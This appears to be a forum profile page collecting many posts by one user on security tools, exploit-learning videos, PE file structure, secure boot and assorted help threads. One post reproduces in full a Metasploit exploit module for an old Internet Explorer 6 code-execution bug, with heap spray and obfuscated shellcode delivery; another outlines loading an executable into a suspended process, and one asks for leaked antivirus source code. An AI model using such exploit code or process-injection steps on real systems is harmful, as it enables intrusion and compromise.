Everything posted by Nytro
-
Yes, I see Linux fairly often on 64 MB Flash chips and ARM processors.
-
Introduction to Network Security Toolkit (NST)

The Network Security Toolkit (NST) is an ISO live CD/DVD (NST Live) based on Fedora. The toolkit was designed to provide easy access to best-of-breed Open Source Network Security Applications and should run on most x86/x86_64 platforms. The main intent of developing this toolkit was to provide the network security administrator with a comprehensive set of Open Source Network Security Tools. The majority of tools published in the article: Top 100 Security Tools by INSECURE.ORG are available in the toolkit. Some of the tools available in this live CD are: Ntop, wireshark, nmap with the visualization tool ZenMap and kismet.

Many tasks that can be performed within NST are available through a web interface called NST WUI. Among the tools that can be used through this interface are nmap with the visualization tool ZenMap, ntop, a session manager for VNC, a minicom-based terminal server, serial port monitoring, and WPA PSK management. You can read some of my articles about Nmap and Ntop by following the links; for Nmap you also get Zenmap.

Zenmap is the official Nmap Security Scanner GUI. It is a multi-platform free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users. Frequently used scans can be saved as profiles to make them easy to run repeatedly. A command creator allows interactive creation of Nmap command lines. Scan results can be saved and viewed later. Saved scan results can be compared with one another to see how they differ. The results of recent scans are stored in a searchable database.

Nagios and Argus are also available on NST, two programs that can be used for network monitoring; you can check the status of various services, like a web server, POP/IMAP mail server or other services that in general you can test directly with a network connection.

Another nice, and really “scenic”, feature is that NST includes visualization of ntop, wireshark, traceroute and kismet data by geocoding the host addresses and displaying them via Google Earth. For this NST uses a custom tool: nstgeolocate — Geolocate hosts obtained from an ‘ntop’ session or Geolocate IPv4 Address conversations from a network packet capture file on a Mercator World Map projection or Global imagery.

There is also a browser-based packet capture and protocol analysis system capable of monitoring up to four network interfaces using Wireshark, as well as a Snort-based intrusion detection system with a “collector” backend that stores incidents in a MySQL database. For web developers, there is also a JavaScript console with a built-in object library with functions that aid the development of dynamic web pages.

A great guide on what is available on the live distro and how to use each tool is present on the official wiki.

Conclusions

This live CD is really filled with security tools and utilities, so it could be really useful to set up in a few minutes a location where you can do a security audit of a network or some hosts. Also really interesting is the option to put it on a virtual machine; on the wiki there is a good how-to on putting NST on VirtualBox. So in a few words: try it and use it for your security audit, you’ll be satisfied for sure.

Source: http://linuxaria.com/article/introduction-to-network-security-toolkit-nst?lang=en
-
Exploiting embedded systems

Overview:
- Embedded systems basics
- Real Time OS
- The ARM architecture
- The JTAG interface
- The UART interface
..............................

Download: http://www.blackhat.com/presentations/bh-europe-06/bh-eu-06-Jack.pdf

It's a presentation, but the concepts can be seen.
-
Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution Vulnerability

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution Vulnerability',
      'Description'    => %q{
          This bug is triggered when the browser handles a JavaScript 'onLoad' handler in
        conjunction with an improperly initialized 'window()' JavaScript function.
        This exploit results in a call to an address lower than the heap. The javascript
        prompt() places our shellcode near where the call operand points to. We call
        prompt() multiple times in separate iframes to place our return address.
        We hide the prompts in a popup window behind the main window. We spray the heap
        a second time with our shellcode and point the return address to the heap. I use
        a fairly high address to make this exploit more reliable. IE will crash when the
        exploit completes. Also, please note that Internet Explorer must allow popups
        in order to continue exploitation.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Benjamin Tobias Franz', # Discovery
          'Stuart Pearson',        # Proof of Concept
          'Sam Sharps'             # Metasploit port
        ],
      'References'     =>
        [
          ['MSB', 'MS05-054'],
          ['CVE', '2005-1790'],
          ['OSVDB', '17094'],
          ['URL', 'http://www.securityfocus.com/bid/13799/info'],
          ['URL', 'http://www.cvedetails.com/cve/CVE-2005-1790'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'InitialAutoRunScript' => 'migrate -f',
        },
      'Payload'        =>
        {
          'Space'           => 1000,
          'BadChars'        => "\x00",
          'Compat'          =>
            {
              'ConnectionType' => '-find',
            },
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Internet Explorer 6 on Windows XP', { 'iframes' => 4 } ],
          [ 'Internet Explorer 6 Windows 2000',  { 'iframes' => 8 } ],
        ],
      'DisclosureDate' => 'Nov 21 2005',
      'DefaultTarget'  => 0))
  end

  def exploit
    @var_redir = rand_text_alpha(rand(100)+1)
    super
  end

  def auto_target(cli, request)
    mytarget = nil

    agent = request.headers['User-Agent']
    print_status("Checking user agent: #{agent}")

    if (agent =~ /MSIE 6\.0/ && agent =~ /Windows NT 5\.1/)
      mytarget = targets[0]   # IE6 on XP
    elsif (agent =~ /MSIE 6\.0/ && agent =~ /Windows NT 5\.0/)
      mytarget = targets[1]   # IE6 on 2000
    else
      print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
    end

    mytarget
  end

  def on_request_uri(cli, request)
    mytarget = auto_target(cli, request)
    var_title = rand_text_alpha(rand(100) + 1)
    func_main = rand_text_alpha(rand(100) + 1)

    heapspray = ::Rex::Exploitation::JSObfu.new %Q|
function heapspray()
{
  shellcode = unescape('#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
  var bigblock = unescape("#{Rex::Text.to_unescape(make_nops(4))}");
  var headersize = 20;
  var slackspace = headersize + shellcode.length;
  while (bigblock.length < slackspace) bigblock += bigblock;
  var fillblock = bigblock.substring(0,slackspace);
  var block = bigblock.substring(0,bigblock.length - slackspace);
  while (block.length + slackspace < 0x40000) block = block + block + fillblock;
  var memory = new Array();
  for (i = 0; i < 250; i++){ memory[i] = block + shellcode }

  var ret = "";
  var fillmem = "";

  for (i = 0; i < 500; i++)
    ret += unescape("%u0F0F%u0F0F");
  for (i = 0; i < 200; i++)
    fillmem += ret;

  prompt(fillmem, "");
}
|
    heapspray.obfuscate

    nofunc = ::Rex::Exploitation::JSObfu.new %Q|

if (document.location.href.indexOf("#{@var_redir}") == -1)
{
  var counter = 0;

  top.consoleRef = open('','BlankWindow',
    'width=100,height=100'
    +',menubar=0'
    +',toolbar=1'
    +',status=0'
    +',scrollbars=0'
    +',left=1'
    +',top=1'
    +',resizable=1')
  self.focus()

  for (counter = 0; counter < #{mytarget['iframes']}; counter++)
  {
    top.consoleRef.document.writeln('<iframe width=1 height=1 src='+document.location.href+'?p=#{@var_redir}</iframe>');
  }
  document.writeln("<body onload=\\"setTimeout('#{func_main}()',6000)\\">");
}
else
{
  #{heapspray.sym('heapspray')}();
}
|
    nofunc.obfuscate

    main = %Q|
function #{func_main}()
{
  document.write("<TITLE>#{var_title}</TITLE>");
  document.write("<body onload=window();>");

  window.location.reload();
}
|

    html = %Q|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<meta http-equiv="Content-Language" content="en-gb">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<script>
#{nofunc}
#{heapspray}
#{main}
</script>
</head>
<body>
</body>
</html>
|

    print_status("Sending #{self.name} to client #{cli.peerhost}")
    # Transmit the compressed response to the client
    send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })

    # Handle the payload
    handler(cli)
  end
end

Source: Microsoft Internet Explorer JavaScript OnLoad Handler Code Execution | Inj3ct0r - exploit database : vulnerability : 0day : shellcode
-
[h=1]OpenVSP[/h]
NASA Open Source Parametric Geometry

OpenVSP is a parametric aircraft geometry tool. OpenVSP allows the user to create a 3D model of an aircraft defined by common engineering parameters. This model can be processed into formats suitable for engineering analysis. The predecessors to OpenVSP have been developed by J.R. Gloudemans and others for NASA since the early 1990's. On January 10 2012, OpenVSP was released as an open source project under the NASA Open Source Agreement (NOSA) version 1.3. We are still in the process of setting up all of the things which allow an open source project to work. In the meantime, get OpenVSP for yourself from the links below.

OpenVSP 2.0 for Windows
OpenVSP 2.0 for Mac OS X
OpenVSP 2.0 Community Edition Source Code

Interesting idea. And what "ugly" source code:

lcsfit_(&c__201, xt, yt, &c_true, "B", &c__1, &xtp, &ym, &ym, (ftnlen)1);
xo = xt[0];
xl[0] = xt[199];
tr = ym * 2.f / (xl[0] - xo);
rat = toc / tr;
sf = rat;
if (toc > e && (r__1 = rat - 1.f, dabs(r__1)) > 1e-4f && it <= 10) {
    goto L400;
}

Source: OpenVSP
-
If you're good, the field doesn't matter, you'll find work. It's harder at the beginning, but little by little you'll find something nice that you enjoy and that brings you a substantial income. On the PHP side there is demand, but there are many people and you have to be good; Java is still in demand, but I don't know for how much longer; administrator positions aren't very numerous, but I think they pay well; and C++ I think will always be in demand. Look on bestjobs/ejobs to see what is in demand, search by the experience required and see what criteria each posting asks for. You'll "lose" two days on this, but then you'll know exactly what you have to do.
-
Hold on, let me look into my crystal ball to guess what the problem with your account is...
-
I think the binary version can be smaller than the size of the source. With Kaspersky I know there were several products, around 2007, or whenever a source appeared, which I have too. But does any of you have source code from Norton or McAfee? Have you found it anywhere? If you find it, please post it here, there are interested people too; I found interesting things in the Kaspersky code.

Edit: http://uk.reuters.com/article/2012/01/14/uk-symantec-hacker-idUKTRE80D09T20120114
-
I still have fans even though I no longer have time to hand out bans and warnings like in my youth.
-
First read about the structure of executables:
- Portable Executable - Wikipedia, the free encyclopedia
- Peering Inside the PE: A Tour of the Win32 Portable Executable File Format
- Inside Windows: An In-Depth Look into the Win32 Portable Executable File Format
- Inside Windows: An In-Depth Look into the Win32 Portable Executable File Format, Part 2
- Microsoft PE and COFF Specification

You could also look over: The .NET File Format - CodeProject®

The problem is that you want an example for .NET... I haven't really seen examples in .NET; search the Programming section, you'll find many useful things, but fewer for .NET.

A new process has to be created (suspended). You allocate space and load the executable (at ImageBase, with the size specified by the OptionalHeader, i.e. SizeOfImage). However, you have to be careful to load each section aligned to the size specified in the executable's structure, after you write the headers (the first thing you do). And with that you've loaded it into memory, it's not extremely complicated. Then you just have to hand execution over to the Entrypoint. WinAPI offers everything you need; you can do the same in .NET with dllimport, but there's no point. I don't know whether .NET has special classes and functions for such actions; there probably should be.
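The layout step from the post above (headers first, then each section at its aligned address inside a SizeOfImage-sized buffer), as an added example that is not part of the original post: a Python sketch that parses the PE headers and builds that layout in a local buffer only, which is the reference to compare a dumped process image against. The function names are this example's own, the sample PE is constructed inline, and the copy rule is simplified to SizeOfRawData bytes per section.

```python
import struct

def parse_pe(data):
    """Read the header fields that decide how the image is laid out in memory."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _, n_sections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic == 0x10B:        # PE32: 4-byte ImageBase at offset 28
        (image_base,) = struct.unpack_from("<I", data, opt + 28)
    elif magic == 0x20B:      # PE32+: 8-byte ImageBase at offset 24
        (image_base,) = struct.unpack_from("<Q", data, opt + 24)
    else:
        raise ValueError("unknown optional header magic")
    (entry_rva,) = struct.unpack_from("<I", data, opt + 16)
    (section_alignment,) = struct.unpack_from("<I", data, opt + 32)
    size_of_image, size_of_headers = struct.unpack_from("<II", data, opt + 56)
    sections = []
    for i in range(n_sections):   # 40-byte entries right after the optional header
        name, vsize, rva, raw_size, raw_ptr = struct.unpack_from(
            "<8sIIII", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "rva": rva, "virtual_size": vsize,
                         "raw_ptr": raw_ptr, "raw_size": raw_size})
    return {"image_base": image_base, "entry_rva": entry_rva,
            "section_alignment": section_alignment, "size_of_image": size_of_image,
            "size_of_headers": size_of_headers, "sections": sections}

def map_image(data, pe):
    """Lay the file out as it sits in memory: headers first, then each section at its RVA."""
    if pe["size_of_headers"] > min(len(data), pe["size_of_image"]):
        raise ValueError("SizeOfHeaders exceeds file or image size")
    image = bytearray(pe["size_of_image"])          # zero-filled, SizeOfImage bytes
    image[:pe["size_of_headers"]] = data[:pe["size_of_headers"]]
    for s in pe["sections"]:
        if s["rva"] % pe["section_alignment"]:
            raise ValueError(f"{s['name']}: RVA not aligned to SectionAlignment")
        end_file, end_mem = s["raw_ptr"] + s["raw_size"], s["rva"] + s["raw_size"]
        if end_file > len(data) or end_mem > len(image):
            raise ValueError(f"{s['name']}: raw data outside file or image")
        image[s["rva"]:end_mem] = data[s["raw_ptr"]:end_file]   # rest stays zero
    return bytes(image)

def build_sample():
    """Constructed sample: a minimal PE32 with two sections (not a real program)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                 # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                 # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)               # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)             # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)       # Section/FileAlignment
    struct.pack_into("<II", opt, 56, 0x3000, 0x200)       # SizeOfImage/SizeOfHeaders
    def entry(name, vsize, rva, raw_ptr, flags):
        return struct.pack("<8sIIII", name, vsize, rva, 0x200, raw_ptr) + bytes(12) \
            + struct.pack("<I", flags)
    table = entry(b".text", 1, 0x1000, 0x200, 0x60000020) \
        + entry(b".data", 11, 0x2000, 0x400, 0xC0000040)
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table).ljust(0x200, b"\0")
    return headers + b"\xC3".ljust(0x200, b"\0") + b"constructed".ljust(0x200, b"\0")

if __name__ == "__main__":
    sample = build_sample()
    pe = parse_pe(sample)
    image = map_image(sample, pe)
    print(hex(pe["image_base"]), hex(pe["size_of_image"]), hex(pe["entry_rva"]))
    for s in pe["sections"]:
        print(s["name"], "file", hex(s["raw_ptr"]), "-> memory", hex(pe["image_base"] + s["rva"]))
```

In the sample the sections sit 0x200 apart in the file (FileAlignment) but 0x1000 apart in memory (SectionAlignment), which is the alignment difference the post warns about.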
-
I think you installed libnet again and not libnet-dev.

root@bt:~/libnet-1.1.5# ./configure

And not

root@bt:~/libnet-dev-1.1.5# ./configure

I don't know, it should work.
-
Did you read what I wrote?

configure: error: libnet0 (dev) is required for this program
-
The problem is that you need the libnet development headers (that "dev" there comes from development; libnet was probably already installed). I think this is it: libnet-dev | Free software downloads at SourceForge.net
-
These are extremely well known, there are many other "commands"... Open the messenger executable with a Hex Editor and look around in there.
-
It shows up in many places because of this damn little icon: http://mystatus.skype.com/smallicon/sample.skype90 We'll fix it today or tomorrow.
-
How to get iTunes Apps / Movies / Albums / Music for free!
Nytro replied to The_Arhitect's topic in Tutoriale in engleza
Anything longer than 10 lines you are not capable of reading and giving an opinion on.
-
Intro To Exploits - Part 1
http://www.youtube.com/watch?v=NzGB-8Sntqc&feature=player_embedded

Description: **This video and Part 2 Segment 1 are more lecture based videos**

What's in this video?
- Coding Practices
- Defining Functions of Interest
- Introduction To Shellcode

I recommend watching in full-screen due to quality issues. This is part 1 of 5. More to come over the next few weeks. Also, sorry about how I was talking in the video, I'm not a strong speaker.

Source: Intro To Exploits - Part 1

Intro To Exploits - Part 2 (Shellcode)
http://www.youtube.com/watch?v=-QlaRVn1K1o&feature=player_embedded

Description: I recommend watching in full-screen due to quality issues. This is the first of two videos for part 2 of 5. The topic of discussion for this video is an expanded explanation of shellcode.
- How shellcode is executed
- Architecture types
- Assembly/hex examples

Also, sorry about how I was talking in the video, I'm not a strong speaker.

Source: Intro To Exploits - Part 2 (Shellcode)

Intro To Exploits - Part 2 (Shellcode Cont.)
http://www.youtube.com/watch?v=m-AxrZxvu8o&feature=player_embedded

Description: ****This video demonstrates the concepts of how shellcode works****

I recommend watching in full-screen due to quality issues. This is the second of two videos for part 2 of 5. This video expands even more on the previous video, and we end Part 2 with a visual example of how shellcode operates.
- Different purposes of shellcode
- Security evasion
- Visual example of shellcode in action (bind and reverse shells)

Source: Intro To Exploits - Part 2 (Shellcode Cont.)

Intro To Exploits - Part 3 (Fuzzing)
http://www.youtube.com/watch?v=v3wOMXZykrE&feature=player_embedded

Description: The topic of this video is fuzzing. At the end of Part 3, we fuzz a simple tcp echo server.
- Types of Fuzzers
- How to know if a fuzzer was successful
- Finding buffer size

I hope you learned a lot as fuzzing is very undocumented outside of the security industry, and the technique itself is more used for auditing many programs with a generic testing tool. The downside of fuzzing is that it is very limited to what it can test, and how deep into a program it can test. Fuzzing is more for an entry point stress test, than it would be for full-on code auditing.

Source: Intro To Exploits - Part 3 (Fuzzing)

Intro To Exploits - Part 4 (Reverse Engineering)
http://www.youtube.com/watch?v=kMWc1PiKWUQ&feature=player_embedded

Description: ****Topic for the video is Reverse Engineering****

This video covers the basics of disassembling/reverse engineering. This is a great video, as I show you how to explore different functions within gdb. This is an awesome tactic for determining what a program might be able to do.
- Exploring the CPU
- Differentiating functions from other stack procedures
- Finding functions and disassembling them
- Finding return addresses

Reverse Engineering is a very broad category, and in its own right deserves its own video series. The steps I go through in this video are more for mapping out a program, rather than editing asm code to change execution flow. Sorry for the pause halfway through the video. I rage-quit halfway through filming it.

Source: Intro To Exploits - Part 4 (Reverse Engineering)

Intro To Exploits - Part 5 (Scenario)
http://www.youtube.com/watch?v=5iUaq_H6wf8&feature=player_embedded

Description: ***This video is intended for learning purposes only. In no way, shape, or form, is the sole purpose of this video intended as a solution to the IO wargame.***

What's in this video? In this video, we put together all of the information we have learned from the previous videos, and apply it to a practical (but very unlikely) buffer overflow situation.
- On the fly exploitation (IO smashthestack level 5)

Source: Intro To Exploits - Part 5 (Scenario)

[h=4]Intro To Exploits - Part 5 (Scenario Cont.)[/h]
http://www.youtube.com/watch?v=NzD67lD9OQU&feature=player_embedded

Description: ***This video is intended for learning purposes only. In no way, shape, or form, is the sole purpose of this video intended to be used as a solution to the IO wargame.***

This video concludes the previous video, and the series. I hope I have helped new people learn a lot, and refresh the memories of the more seasoned folks. Thank you for watching!

Source: http://www.securitytube.net/video/2649
-
[h=4]Cracking Hashes From A Meterpreter Session With Hashcat[/h]
Description: Cracking Hashes From a Meterpreter Session with Hashcat, FOLLOW @sL0ps

Source: Cracking Hashes From A Meterpreter Session With Hashcat
-
[h=4]Shellcode2Exe Shellcode Analysis[/h]
http://www.youtube.com/watch?v=FTDZyYt7Fqk&feature=player_embedded

Description: Converting shellcode into an executable is a simple analysis technique that allows you to use your favorite debugger to analyze the code at run time. This video describes the input and output formats supported by the Shellcode2Exe tool.

Source: Shellcode2Exe Shellcode Analysis
-
[h=4]Scdbg - Shellcode Analysis[/h]
Description: This video covers basic use of the scdbg tool to analyze several types of shellcode. scdbg is a tool written around the libemu library which runs shellcode in an emulated environment and displays all of the Windows API calls made during execution. scdbg also includes an integrated debug shell and complex options such as a report mode which tells you intimate details about how the shellcode was constructed. scdbg is open source and freely available. Versions are available for both Windows and Linux.

Homepage: RE Corner

Source: Scdbg - Shellcode Analysis
-
[h=3]New Generic Top-Level Domains (gTLDs) out for Sale[/h]
Published: 2012-01-13, Last Updated: 2012-01-13 15:44:20 UTC by Guy Bruneau (Version: 1)

Yesterday ICANN started accepting applications for new generic top-level domains (gTLDs). "The world of .com, .gov, .org and 19 other gTLDs will soon be expanded to include all types of words in many different languages. For the first time generic TLDs can include words in non-Latin languages, such as Cyrillic, Chinese or Arabic." [1]

Last month, the US Federal Trade Commission indicated it has concerns with this change, they are concerned that consumer protection safeguard against bad actors that could lead to potential risk of abuse through existing scams such as phishing sites. [2]

Do you see these changes have a potential for concern and abuse or just business as usual?

[1] ICANN | New gTLDs Update: Applications Accepted Today; New Guidebook Posted; Financial Assistance for Qualifying Applicants
[2] http://www.ftc.gov/os/closings/publicltrs/111216letter-to-icann.pdf
[3] Home | ICANN New gTLDs

-----------
Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu

Source: ISC Diary | New Generic Top-Level Domains (gTLDs) out for Sale
-
[h=1]Microsoft confirms UEFI fears, locks down ARM devices[/h]
[h=3]By Aaron Williamson | January 12, 2012[/h]

At the beginning of December, we warned the Copyright Office that operating system vendors would use UEFI secure boot anticompetitively, by colluding with hardware partners to exclude alternative operating systems. As Glyn Moody points out, Microsoft has wasted no time in revising its Windows Hardware Certification Requirements to effectively ban most alternative operating systems on ARM-based devices that ship with Windows 8.

The Certification Requirements define (on page 116) a "custom" secure boot mode, in which a physically present user can add signatures for alternative operating systems to the system's signature database, allowing the system to boot those operating systems. But for ARM devices, Custom Mode is prohibited: "On an ARM system, it is forbidden to enable Custom Mode. Only Standard Mode may be enable." [sic] Nor will users have the choice to simply disable secure boot, as they will on non-ARM systems: "Disabling Secure [boot] MUST NOT be possible on ARM systems." [sic] Between these two requirements, any ARM device that ships with Windows 8 will never run another operating system, unless it is signed with a preloaded key or a security exploit is found that enables users to circumvent secure boot.

While UEFI secure boot is ostensibly about protecting user security, these non-standard restrictions have nothing to do with security. For non-ARM systems, Microsoft requires that Custom Mode be enabled—a perverse demand if Custom Mode is a security threat. But the ARM market is different for Microsoft in three important respects:

- Microsoft's hardware partners are different for ARM. ARM is of interest to Microsoft primarily for one reason: all of the handsets running the Windows Phone operating system are ARM-based. By contrast, Intel rules the PC world. There, Microsoft's secure boot requirements—which allow users to add signatures in Custom Mode or disable secure boot entirely—track very closely to the recommendations of the UEFI Forum, of which Intel is a founding member.
- Microsoft doesn't need to support legacy Windows versions on ARM. If Microsoft locked unsigned operating systems out of new PCs, it would risk angering its own customers who prefer Windows XP or Windows 7 (or, hypothetically, Vista). With no legacy versions to support on ARM, Microsoft is eager to lock users out.
- Microsoft doesn't control sufficient market share on mobile devices to raise antitrust concerns. While Microsoft doesn't command quite the monopoly on PCs that it did in 1998, when it was prosecuted for antitrust violations, it still controls around 90% of the PC operating system market—enough to be concerned that banning non-Windows operating systems from Windows 8 PCs will bring regulators knocking. Its tiny stake in the mobile market may not be a business strategy, but for now it may provide a buffer for its anticompetitive behavior there. (However, as ARM-based "ultrabooks" gain market share, this may change.)

The new policy betrays the cynicism of Microsoft's initial response to concerns over Windows 8's secure boot requirement. When kernel hacker Matthew Garrett expressed his concern that PCs shipped with Windows 8 might prevent the installation of GNU/Linux and other free operating systems, Microsoft's Tony Mangefeste replied, "Microsoft’s philosophy is to provide customers with the best experience first, and allow them to make decisions themselves." It is clear now that opportunism, not philosophy, is guiding Microsoft's secure boot policy.

Before this week, this policy might have concerned only Windows Phone customers. But just yesterday, Qualcomm announced plans to produce Windows 8 tablets and ultrabook-style laptops built around its ARM-based Snapdragon processors. Unless Microsoft changes its policy, these may be the first PCs ever produced that can never run anything but Windows, no matter how Qualcomm feels about limiting its customers' choices. SFLC predicted in our comments to the Copyright Office that misuse of UEFI secure boot would bring such restrictions, already common on smartphones, to PCs. Between Microsoft's new ARM secure boot policy and Qualcomm's announcement, this worst-case scenario is beginning to look inevitable.

Source: Microsoft confirms UEFI fears, locks down ARM devices - SFLC Blog - Software Freedom Law Center
-
[h=4]Iphone Forensics - On Ios 5[/h]
Description: The goal of iPhone forensics is to extract data and artifacts from the iPhone without altering the information on the device. This video explains the technical procedure and the challenges involved in extracting data from the live iPhone.

iPhone Forensics | InfoSec Institute – IT Training and Information Security Resources

Source: Iphone Forensics - On Ios 5